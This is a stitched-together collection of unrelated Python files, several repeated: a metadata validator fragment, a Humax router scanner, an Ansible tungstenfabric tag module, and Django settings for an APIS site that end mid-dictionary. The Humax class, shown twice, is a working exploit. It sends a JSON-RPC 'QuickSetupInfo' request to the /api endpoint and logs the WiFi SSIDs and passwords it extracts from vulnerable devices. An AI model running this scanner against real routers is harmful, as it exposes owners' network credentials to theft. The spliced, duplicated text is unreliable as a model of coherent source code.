            'In the file \'{}\', the modelName \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['modelName']))
    # The family must be one of the known task identifiers
    if not rocket_info['family'] in LIST_ROCKET_FAMILIES:
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\', the family \'{}\' is not valid. Please refer to the documentation for a list of valid family names.'.format(metadata_json_path, rocket_info['family']))
    # isTrainable must be a real boolean, not a truthy string
    if not isinstance(rocket_info['isTrainable'], bool):
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\',the field isTrainable needs to be a Boolean'.format(
                metadata_json_path))
    # blueprint must be a list of filenames
    if not isinstance(rocket_info['blueprint'], list):
        raise rocketbase.exceptions.RocketInfoFormat(
            'In the file \'{}\',the field blueprint needs to be a list of filenames.'.format(
                metadata_json_path))
    return rocket_info
import requests
import logging
import httplib2
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
class Humax():
    """Scan Humax devices for the /api credentials-disclosure issue.

    Probes each target for sane HTTP behaviour first (check_host), then
    queries the JSON-RPC /api endpoint for WiFi credentials (exploit).
    Findings are collected as ';'-separated strings in self.findings.
    """

    def __init__(self, target_list):
        # target_list entries are 'ip:port' strings
        self.target_list = target_list
        self.findings = []

    def check_host(self, target, port):
        """
        Send testing request to server to check if it responds with a 200 to any requests
        :param target: string
        :param port: string
        :return: boolean
        """
        url = target + ':' + port
        # Two bogus paths plus the root: a sane server must not answer 200 to all three
        test_strings = ['/sjf_hdid', '/s_a?jghjf/', '/']
        response = 0
        errors = 0
        for test in test_strings:
            try:
                conn = httplib2.Http(disable_ssl_certificate_validation=True)
                if port == '443':
                    try:
                        resp, content = conn.request('https://' + url + test, 'GET')
                        if resp['status'] == '200':
                            response += 1
                    except Exception:
                        # Best-effort TLS probe; individual failures are ignored
                        pass
                else:
                    resp, content = conn.request('http://' + url + test, 'HEAD')
                    if resp['status'] == '200':
                        response += 1
            except Exception as e:
                # Fixed: httplib2 raises its own exception types (e.g.
                # httplib2.ServerNotFoundError) and socket errors, which the
                # previous 'except ConnectionError' never caught, so the
                # error counter could never reach its limit.
                errors += 1
                logging.debug('Error: ' + str(e))
            if errors == 3:
                logging.debug(R + 'Error limit reached for host %s:%s' % (target, port) + W)
                return False
            elif response == 3:
                logging.debug(R + 'Ambiguous response from web server on %s:%s. All URIs return status 200' % (target, port) + W)
                return False
        return True

    def run(self):
        """Probe every target and run the exploit against responsive hosts."""
        for target in self.target_list:
            ip = target.split(':')[0]
            port = target.split(':')[1]
            logging.info('Testing: %s:%s' % (ip, port))
            if self.check_host(ip, port):
                self.exploit(ip, port)
        return self.findings

    def exploit(self, ip, port):
        """Query the /api JSON-RPC endpoint and record any disclosed WiFi credentials."""
        host = 'http://' + ip + ':' + port
        path = '/api'
        payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
        try:
            response = requests.post(host + path, data=payload)
            response.raise_for_status()
            # Parse the JSON body once instead of re-parsing it on every access
            body = response.json()
            if 'result' not in body or 'WiFi_Info' not in body['result'] or 'wlan' not in \
                    body['result']['WiFi_Info']:
                logging.warning(R + 'Error, target may be no exploitable' + W)
                return
            for wlan in body['result']['WiFi_Info']['wlan']:
                result = 'Wifi data found:' + W + '\nSSID: %s' % wlan["ssid"] + '\nPWD: %s' % wlan["password"]
                logging.info(G + result + W)
                finding = ip + ';' + port + ';' + 'HTTP' + ';' + 'Credentials Disclosure' + ';' + 'Humax' + ';' + result
                self.findings.append(finding)
        except Exception as e:
            logging.warning('Error with host: %s:%s Details: %s' % (ip, port, str(e)))
import requests
import logging
import httplib2
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
class Humax():
    """Scan Humax devices for the /api credentials-disclosure issue.

    Probes each target for sane HTTP behaviour first (check_host), then
    queries the JSON-RPC /api endpoint for WiFi credentials (exploit).
    Findings are collected as ';'-separated strings in self.findings.
    """

    def __init__(self, target_list):
        # target_list entries are 'ip:port' strings
        self.target_list = target_list
        self.findings = []

    def check_host(self, target, port):
        """
        Send testing request to server to check if it responds with a 200 to any requests
        :param target: string
        :param port: string
        :return: boolean
        """
        url = target + ':' + port
        # Two bogus paths plus the root: a sane server must not answer 200 to all three
        test_strings = ['/sjf_hdid', '/s_a?jghjf/', '/']
        response = 0
        errors = 0
        for test in test_strings:
            try:
                conn = httplib2.Http(disable_ssl_certificate_validation=True)
                if port == '443':
                    try:
                        resp, content = conn.request('https://' + url + test, 'GET')
                        if resp['status'] == '200':
                            response += 1
                    except Exception:
                        # Best-effort TLS probe; individual failures are ignored
                        pass
                else:
                    resp, content = conn.request('http://' + url + test, 'HEAD')
                    if resp['status'] == '200':
                        response += 1
            except Exception as e:
                # Fixed: httplib2 raises its own exception types (e.g.
                # httplib2.ServerNotFoundError) and socket errors, which the
                # previous 'except ConnectionError' never caught, so the
                # error counter could never reach its limit.
                errors += 1
                logging.debug('Error: ' + str(e))
            if errors == 3:
                logging.debug(R + 'Error limit reached for host %s:%s' % (target, port) + W)
                return False
            elif response == 3:
                logging.debug(R + 'Ambiguous response from web server on %s:%s. All URIs return status 200' % (target, port) + W)
                return False
        return True

    def run(self):
        """Probe every target and run the exploit against responsive hosts."""
        for target in self.target_list:
            ip = target.split(':')[0]
            port = target.split(':')[1]
            logging.info('Testing: %s:%s' % (ip, port))
            if self.check_host(ip, port):
                self.exploit(ip, port)
        return self.findings

    def exploit(self, ip, port):
        """Query the /api JSON-RPC endpoint and record any disclosed WiFi credentials."""
        host = 'http://' + ip + ':' + port
        path = '/api'
        payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
        try:
            response = requests.post(host + path, data=payload)
            response.raise_for_status()
            # Parse the JSON body once instead of re-parsing it on every access
            body = response.json()
            if 'result' not in body or 'WiFi_Info' not in body['result'] or 'wlan' not in \
                    body['result']['WiFi_Info']:
                logging.warning(R + 'Error, target may be no exploitable' + W)
                return
            for wlan in body['result']['WiFi_Info']['wlan']:
                result = 'Wifi data found:' + W + '\nSSID: %s' % wlan["ssid"] + '\nPWD: %s' % wlan["password"]
                logging.info(G + result + W)
                finding = ip + ';' + port + ';' + 'HTTP' + ';' + 'Credentials Disclosure' + ';' + 'Humax' + ';' + result
                self.findings.append(finding)
        except Exception as e:
            logging.warning('Error with host: %s:%s Details: %s' % (ip, port, str(e)))
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: tag
short_description: create tungstenfabirc tag
version_added: "2.9"
description:
- "create / delete tungstenfabric tag"
options:
name:
description:
- tag name
required: true
controller_ip:
description:
- tungstenfabric controller ip
required: true
project:
description:
- project name (if it is defined, tag will be project scoped tag)
required: false
author:
- <NAME> (@tnaganawa)
'''
EXAMPLES = '''
# Pass in a message
- name: create tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: present
project: admin
tag_type: label
- name: delete tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: absent
'''
RETURN = '''
message:
description: The output message that this module generates
type: str
returned: always
'''
import sys
import json
import requests
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.tungstenfabric.networking.plugins.module_utils.common import login_and_check_id, crud
def run_module():
    """Create or delete a tungstenfabric tag via the controller API.

    Reads the module parameters, looks the tag up on the controller
    (login_and_check_id) and either keeps/creates it (state=present) or
    deletes it (state=absent) through the shared crud helper.
    """
    module_args = dict(
        name=dict(type='str', required=True),
        controller_ip=dict(type='str', required=True),
        username=dict(type='str', required=False, default='admin'),
        # NOTE(review): this default looks like a redacted placeholder
        # ('<PASSWORD>'); confirm the intended default password.
        password=dict(type='str', required=False, default='<PASSWORD>'),
        state=dict(type='str', required=False, default='present', choices=['absent', 'present']),
        uuid=dict(type='str', required=False),
        domain=dict(type='str', required=False, default='default-domain'),
        project=dict(type='str', required=False),
        tag_type=dict(type='str', required=False, default='label', choices=["application", "site", "deployment", "tier", "label"])
    )
    result = dict(
        changed=False,
        message=''
    )
    # tag_type is only required when creating/updating a tag
    required_if_args = [
        ["state", "present", ["tag_type"]]
    ]
    module = AnsibleModule(
        argument_spec=module_args,
        supports_check_mode=True,
        required_if=required_if_args
    )
    name = module.params.get("name")
    controller_ip = module.params.get("controller_ip")
    username = module.params.get("username")
    # Fixed: this line previously read 'password = <PASSWORD>("password")'
    # (corrupted/redacted source), which is a syntax error; restored to the
    # same module.params.get pattern as the surrounding parameters.
    password = module.params.get("password")
    state = module.params.get("state")
    domain = module.params.get("domain")
    project = module.params.get("project")
    tag_type = module.params.get("tag_type")
    if module.check_mode:
        module.exit_json(**result)
    obj_type='tag'
    # Tags are addressed as '<tag_type>=<value>' on the controller
    tag_type_name = tag_type + '=' + name
    (web_api, update, uuid, js) = login_and_check_id(module, tag_type_name, obj_type, controller_ip, username, password, state, domain=domain, project=project)
    if update and state=='present':
        # Tag already exists; reuse the payload returned by login_and_check_id
        pass
    else:
        ## create payload and call API
        if project:
            # Project-scoped tag
            js=json.loads (
            '''
            { "tag":
              {
                "fq_name": ["%s", "%s", "%s"],
                "tag_type_name": "%s",
                "tag_value": "%s",
                "parent_type": "project"
              }
            }
            ''' % (domain, project, name, tag_type, name)
            )
        else:
            # Global tag
            js=json.loads (
            '''
            { "tag":
              {
                "fq_name": ["%s"],
                "tag_type_name": "%s",
                "tag_value": "%s"
              }
            }
            ''' % (name, tag_type, name)
            )
    ## begin: object specific
    ## end: object specific
    payload=json.dumps(js)
    failed = crud (web_api, controller_ip, update, state, result, payload=payload, obj_type=obj_type, uuid=uuid)
    if failed:
        module.fail_json(msg='failure message', **result)
    module.exit_json(**result)
def main():
    """Module entry point."""
    run_module()


if __name__ == '__main__':
    main()
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: tag
short_description: create tungstenfabirc tag
version_added: "2.9"
description:
- "create / delete tungstenfabric tag"
options:
name:
description:
- tag name
required: true
controller_ip:
description:
- tungstenfabric controller ip
required: true
project:
description:
- project name (if it is defined, tag will be project scoped tag)
required: false
author:
- <NAME> (@tnaganawa)
'''
EXAMPLES = '''
# Pass in a message
- name: create tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: present
project: admin
tag_type: label
- name: delete tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: absent
'''
RETURN = '''
message:
description: The output message that this module generates
type: str
returned: always
'''
import sys
import json
import requests
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.tungstenfabric.networking.plugins.module_utils.common import login_and_check_id, crud
def run_module():
    """Create or delete a tungstenfabric tag via the controller API.

    Reads the module parameters, looks the tag up on the controller
    (login_and_check_id) and either keeps/creates it (state=present) or
    deletes it (state=absent) through the shared crud helper.
    """
    module_args = dict(
        name=dict(type='str', required=True),
        controller_ip=dict(type='str', required=True),
        username=dict(type='str', required=False, default='admin'),
        # NOTE(review): this default looks like a redacted placeholder
        # ('<PASSWORD>'); confirm the intended default password.
        password=dict(type='str', required=False, default='<PASSWORD>'),
        state=dict(type='str', required=False, default='present', choices=['absent', 'present']),
        uuid=dict(type='str', required=False),
        domain=dict(type='str', required=False, default='default-domain'),
        project=dict(type='str', required=False),
        tag_type=dict(type='str', required=False, default='label', choices=["application", "site", "deployment", "tier", "label"])
    )
    result = dict(
        changed=False,
        message=''
    )
    # tag_type is only required when creating/updating a tag
    required_if_args = [
        ["state", "present", ["tag_type"]]
    ]
    module = AnsibleModule(
        argument_spec=module_args,
        supports_check_mode=True,
        required_if=required_if_args
    )
    name = module.params.get("name")
    controller_ip = module.params.get("controller_ip")
    username = module.params.get("username")
    # Fixed: this line previously read 'password = <PASSWORD>("password")'
    # (corrupted/redacted source), which is a syntax error; restored to the
    # same module.params.get pattern as the surrounding parameters.
    password = module.params.get("password")
    state = module.params.get("state")
    domain = module.params.get("domain")
    project = module.params.get("project")
    tag_type = module.params.get("tag_type")
    if module.check_mode:
        module.exit_json(**result)
    obj_type='tag'
    # Tags are addressed as '<tag_type>=<value>' on the controller
    tag_type_name = tag_type + '=' + name
    (web_api, update, uuid, js) = login_and_check_id(module, tag_type_name, obj_type, controller_ip, username, password, state, domain=domain, project=project)
    if update and state=='present':
        # Tag already exists; reuse the payload returned by login_and_check_id
        pass
    else:
        ## create payload and call API
        if project:
            # Project-scoped tag
            js=json.loads (
            '''
            { "tag":
              {
                "fq_name": ["%s", "%s", "%s"],
                "tag_type_name": "%s",
                "tag_value": "%s",
                "parent_type": "project"
              }
            }
            ''' % (domain, project, name, tag_type, name)
            )
        else:
            # Global tag
            js=json.loads (
            '''
            { "tag":
              {
                "fq_name": ["%s"],
                "tag_type_name": "%s",
                "tag_value": "%s"
              }
            }
            ''' % (name, tag_type, name)
            )
    ## begin: object specific
    ## end: object specific
    payload=json.dumps(js)
    failed = crud (web_api, controller_ip, update, state, result, payload=payload, obj_type=obj_type, uuid=uuid)
    if failed:
        module.fail_json(msg='failure message', **result)
    module.exit_json(**result)
def main():
    """Module entry point."""
    run_module()


if __name__ == '__main__':
    main()
import os
from typing import Dict, Any
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.abspath(os.path.join(__file__, "../")))
)
SHARED_URL = "https://shared.acdh.oeaw.ac.at/"
ACDH_IMPRINT_URL = "https://shared.acdh.oeaw.ac.at/acdh-common-assets/api/imprint.php?serviceID="
PROJECT_NAME = "apis"
PROJECT_SHARED = "https://shared.acdh.oeaw.ac.at/apis/"
# Default project metadata, used when no project-specific metadata.json exists.
PROJECT_DEFAULT_MD = {
    'title': 'TITLE',
    'author': '<NAME>, <NAME>',
    'subtitle': 'SUBTITLE',
    # Fixed: this value was a plain (non-f) string, so the {PROJECT_SHARED} /
    # {PROJECT_NAME} placeholders were never interpolated, and the word
    # 'provide' was duplicated across the line break.
    'description': f"""This is a default metadata file. To change this, \
provide a following file {PROJECT_SHARED}/{PROJECT_NAME}/metadata.json""",
    'github': 'https://github.com/acdh-oeaw/apis-webpage-base',
    'production instance': None,
    'purpose_de': '',
    'purpose_en': """""",
    'version': ['apis_core', 'charts', 'django'],
    'matomo_id': '',
    'matomo_url': '',
    'imprint': '/imprint',
    # Fixed: 'social_media' was defined twice in this literal; only the second
    # definition (with 'fa-2x') survived, so the first one is dropped here.
    'social_media': [
        ('fab fa-twitter fa-2x', 'https://twitter.com/ACDH_OeAW'),
        ('fab fa-youtube fa-2x', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
    ],
    'app_type': 'database',
}
# Application definition
INSTALLED_APPS = [
"dal",
# 'corsheaders',
"dal_select2",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"reversion",
"reversion_compare",
"crispy_forms",
"django_filters",
"django_tables2",
"rest_framework",
"webpage",
"browsing",
"apis_core.apis_entities",
"apis_core.apis_metainfo",
"apis_core.apis_relations",
"apis_core.apis_vocabularies",
"apis_core.apis_labels",
"apis_core.apis_tei",
# 'apis_core.apis_vis',
"rest_framework.authtoken",
#"drf_yasg",
"drf_spectacular",
"guardian",
"charts",
"infos",
"csvexport"
]
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_METHODS = ("GET", "OPTIONS")
# drf-spectacular OpenAPI schema settings.
SPECTACULAR_SETTINGS: Dict[str, Any] = {
    'TITLE': 'APIS generic API',
    # Fixed: the key was misspelled 'DESCRIPTIOPN', so drf-spectacular
    # silently ignored the API description.
    'DESCRIPTION': 'Provides access to the main APIS data-model endpoints.',
    'LICENSE': {'name': 'MIT License', 'url': 'https://www.mit.edu/~amini/LICENSE.md'},
    'VERSION': '0.13'
}
CRISPY_TEMPLATE_PACK = "bootstrap3"
REST_FRAMEWORK = {
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 50,
"DEFAULT_PERMISSION_CLASSES": (
#"rest_framework.permissions.DjangoModelPermissions",
#"rest_framework.permissions.IsAuthenticated",
"rest_framework.permissions.DjangoObjectPermissions",
# use IsAuthenticated for every logged in user to have global edit rights
),
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.TokenAuthentication",
"rest_framework.authentication.SessionAuthentication",
"rest_framework.authentication.BasicAuthentication",
),
'DEFAULT_FILTER_BACKENDS': (
'django_filters.rest_framework.DjangoFilterBackend',
'drf_spectacular.contrib.django_filters.DjangoFilterBackend'
),
'DEFAULT_SCHEMA_CLASS': 'drf_spectacular.openapi.AutoSchema',
}
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend", # this is default
"guardian.backends.ObjectPermissionBackend",
)
MIDDLEWARE = [
"corsheaders.middleware.CorsMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"reversion.middleware.RevisionMiddleware",
"crum.CurrentRequestUserMiddleware",
]
ROOT_URLCONF = "apis.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"webpage.webpage_content_processors.installed_apps",
"webpage.webpage_content_processors.is_dev_version",
"webpage.webpage_content_processors.get_db_name",
"webpage.webpage_content_processors.title_img",
"webpage.webpage_content_processors.logo_img",
"webpage.webpage_content_processors.custom_css",
"webpage.webpage_content_processors.shared_url",
"webpage.webpage_content_processors.apis_app_name",
"apis_core.context_processors.custom_context_processors.add_entities",
"apis_core.context_processors.custom_context_processors.add_relations",
"apis_core.context_processors.custom_context_processors.add_apis_settings",
]
},
}
]
WSGI_APPLICATION = "apis.wsgi.application"
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
APIS_BASE_URI = "TO CHANGE"
APIS_MIN_CHAR = 0
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles/")
STATIC_URL = "/static/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media/")
MEDIA_URL = "/media/"
DJANGO_TABLES2_TEMPLATE = "django_tables2/bootstrap4.html"
APIS_COMPONENTS = []
# APIS settings
APIS_TEI_TEXTS = ["xml/tei transcription"]
APIS_CETEICEAN_CSS = "https://teic.github.io/CETEIcean/css/CETEIcean.css"
APIS_CETEICEAN_JS = "https://teic.github.io/CETEIcean/js/CETEI.js"
APIS_NEXT_PREV = True
APIS_ALTERNATE_NAMES = [
"Taufname",
"Ehename",
"Name laut ÖBL XML",
"alternative Namensform",
"alternative name",
"Künstlername",
"Mädchenname",
"Pseudonym",
"weitere Namensform",
]
APIS_RELATIONS_FILTER_EXCLUDE = [
"uri",
"tempentityclass",
"user",
"__id",
"source",
"label",
"temp_entity",
"collection__",
"_ptr",
"baseclass",
"id",
"written",
"relation_type__description",
"relation_type__parent_class",
"relation_type__status",
"relation_type__vocab_name",
"relation_type__name_reverse",
"__text",
"annotation_set_relation",
]
APIS_RELATIONS = {
"list_filters": [("relation_type",)],
"search": ["relation_type__name"],
"exclude": ["name"],
"PersonPlace": {
"labels": ["related_person", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_place__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_place",)],
},
"PersonInstitution": {
"labels": ["related_person", "related_institution", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_institution__name",
],
"list_filters": [
("relation_type",),
("related_person",),
("related_institution",),
],
},
"PersonEvent": {
"labels": ["related_person", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_event__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_event",)],
},
"PersonWork": {
"labels": ["related_person", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_work__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_work",)],
},
"PersonPerson": {
"labels": ["related_personA", "related_personB", "relation_type"],
"search": [
"relation_type__name",
"related_personA__name",
"related_personA__first_name",
"related_personB__name",
"related_personB__first_name",
],
"list_filters": [
("relation_type",),
("related_personA",),
("related_personB",),
],
},
"InstitutionPlace": {
"labels": ["related_institution", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_place__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_place",),
],
},
"InstitutionWork": {
"labels": ["related_institution", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_work__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_work",),
],
},
"InstitutionEvent": {
"labels": ["related_institution", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_event__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_event",),
],
},
"InstitutionInstitution": {
"labels": ["related_institutionA", "related_institutionB", "relation_type"],
"search": [
"relation_type__name",
"related_institutionA__name",
"related_institutionB__name",
],
"list_filters": [
("relation_type",),
("related_institutionA",),
("related_institutionB",),
],
},
"PlaceWork": {
"labels": ["related_work", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_work",)],
},
"PlaceEvent": {
"labels": ["related_event", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_event__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_event",)],
},
"PlacePlace": {
"labels": ["related_placeA", "related_placeB", "relation_type"],
"search": [
"relation_type__name",
"related_placeA__name",
"related_placeB__name",
],
"list_filters": [("relation_type",), ("related_placeA",), ("related_placeB",)],
},
"EventWork": {
"labels": ["related_event", "related_work", "relation_type"],
"search": ["relation_type__name", "related_event__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_event",), ("related_work",)],
},
"EventEvent": {
"labels": ["related_eventA", "related_eventB", "relation_type"],
"search": [
"relation_type__name",
"related_eventA__name",
"related_eventB__name",
],
"list_filters": [("relation_type",), ("related_eventA",), ("related_eventB",)],
},
"WorkWork": {
"labels": ["related_workA", "related_workB", "relation_type"],
"search": ["relation_type__name", "related_workA__name", "related_workB__name"],
"list_filters": [("relation_type",), ("related_workA",), ("related_workB",)],
},
}
APIS_VOCABULARIES = {"exclude": ["userAdded"]}
APIS_METAINFO = {"exclude": ["groups_allowed"]}
APIS_ENTITIES = {
"Place": {
"merge": True,
"search": ["name"],
"form_order": ["name", "kind", "lat", "lng", "status", "collection"],
"table_fields": ["name"],
"additional_cols": ["id", "lat", "lng", "part_of"],
"list_filters": [
{"name": {"method": "name_label_filter"}},
{"collection": {"label": "Collection"}},
{"kind": {"label": "Kind of Place"}},
"related_entity_name",
"related_relationtype_name",
"lat",
"lng",
],
},
"Person": {
"merge": True,
"search": ["name", "first_name"],
"form_order": ["first_name", "name", "start_date_written", "end_date_written", "profession", "status", "collection"],
"table_fields": ["name", "first_name", "start_date_written", "end_date_written"],
"additional_cols": ["id", "profession", "gender"],
"list_filters": [
"name",
{"gender": {"label": "Gender"}},
{"start_date": {"label": "Date of Birth"}},
{"end_date": {"label": "Date of Death"}},
{"profession": {"label": "Profession"}},
{"title": {"label": "Title"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Institution": {
"merge": True,
"search": ["name"],
"form_order": ["name", "start_date_written", "end_date_written", "kind", "status", "collection"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name or label of institution"}},
{"kind": {"label": "Kind of Institution"}},
{"start_date": {"label": "Date of foundation"}},
{"end_date": {"label": "Date of termination"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Work": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name of work"}},
{"kind": {"label": "Kind of Work"}},
{"start_date": {"label": "Date of creation"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Event": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", ],
"list_filters": [
{"name": {"label": "Name of event"}},
{"kind": {"label": "Kind of Event"}},
{"start_date": {"label": "Date of beginning"}},
{"end_date": {"label": "Date of end"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
}
APIS_API_EXCLUDE_SETS = True # exclude reverse links to entities
APIS_LIST_VIEWS_ALLOWED = False
APIS_DETAIL_VIEWS_ALLOWED = False
MAX_AGE = 60*60
APIS_LIST_VIEW_TEMPLATE = "browsing/generic_list.html"
APIS_DELETE_VIEW_TEMPLATE = "webpage/confirm_delete.html"
APIS_IIIF_WORK_KIND = "IIIF"
APIS_IIIF_ENT_IIIF_REL = "has iiif image"
APIS_IIIF_SERVER = "https://iiif.acdh.oeaw.ac.at/"
# OpenSeadragon viewer assets (CDN).
APIS_OSD_JS = (
    "https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/openseadragon.min.js"
)
APIS_OSD_IMG_PREFIX = (
    "https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/images/"
)
# (dataset residue removed from the line above; the import below belongs to
# the following concatenated copy of this settings file)
import os
from typing import Dict, Any
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR resolves two directory levels above this settings module.
BASE_DIR = os.path.dirname(
    os.path.dirname(os.path.abspath(os.path.join(__file__, "../")))
)
# Base URLs for assets/pages shared across ACDH projects.
SHARED_URL = "https://shared.acdh.oeaw.ac.at/"
ACDH_IMPRINT_URL = "https://shared.acdh.oeaw.ac.at/acdh-common-assets/api/imprint.php?serviceID="
PROJECT_NAME = "apis"
PROJECT_SHARED = "https://shared.acdh.oeaw.ac.at/apis/"
# Fallback project metadata, used when no metadata.json is provided at
# {PROJECT_SHARED}/{PROJECT_NAME}/metadata.json.
PROJECT_DEFAULT_MD = {
    'title': 'TITLE',
    'author': '<NAME>, <NAME>',
    'subtitle': 'SUBTITLE',
    'description': """This is a default metadata file. To change this, provide\
provide a following file {PROJECT_SHARED}/{PROJECT_NAME}/metadata.json""",
    'github': 'https://github.com/acdh-oeaw/apis-webpage-base',
    'production instance': None,
    'purpose_de': '',
    'purpose_en': """""",
    'version': ['apis_core', 'charts', 'django'],
    'matomo_id': '',
    'matomo_url': '',
    'imprint': '/imprint',
    # Bug fix: this key appeared twice in the literal; in a dict literal the
    # later entry silently wins, so the first (non "fa-2x") copy was dead
    # code and has been removed. Runtime value is unchanged.
    'social_media': [
        ('fab fa-twitter fa-2x', 'https://twitter.com/ACDH_OeAW'),
        ('fab fa-youtube fa-2x', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
    ],
    'app_type': 'database',
}
# Application definition
INSTALLED_APPS = [
    # django-autocomplete-light (listed ahead of the admin app).
    "dal",
    # 'corsheaders',
    "dal_select2",
    # Django core apps.
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    # Model version history / audit.
    "reversion",
    "reversion_compare",
    # Forms, filtering, tables, REST API.
    "crispy_forms",
    "django_filters",
    "django_tables2",
    "rest_framework",
    # Project-level apps.
    "webpage",
    "browsing",
    # APIS core apps.
    "apis_core.apis_entities",
    "apis_core.apis_metainfo",
    "apis_core.apis_relations",
    "apis_core.apis_vocabularies",
    "apis_core.apis_labels",
    "apis_core.apis_tei",
    # 'apis_core.apis_vis',
    "rest_framework.authtoken",
    #"drf_yasg",
    # OpenAPI schema generation.
    "drf_spectacular",
    # Object-level permissions.
    "guardian",
    "charts",
    "infos",
    "csvexport"
]
# Honour X-Forwarded-* headers (app presumably runs behind a reverse proxy).
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# CORS: allow cross-origin access from any origin, read-only methods.
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_METHODS = ("GET", "OPTIONS")
# drf-spectacular OpenAPI schema settings.
SPECTACULAR_SETTINGS: Dict[str, Any] = {
    'TITLE': 'APIS generic API',
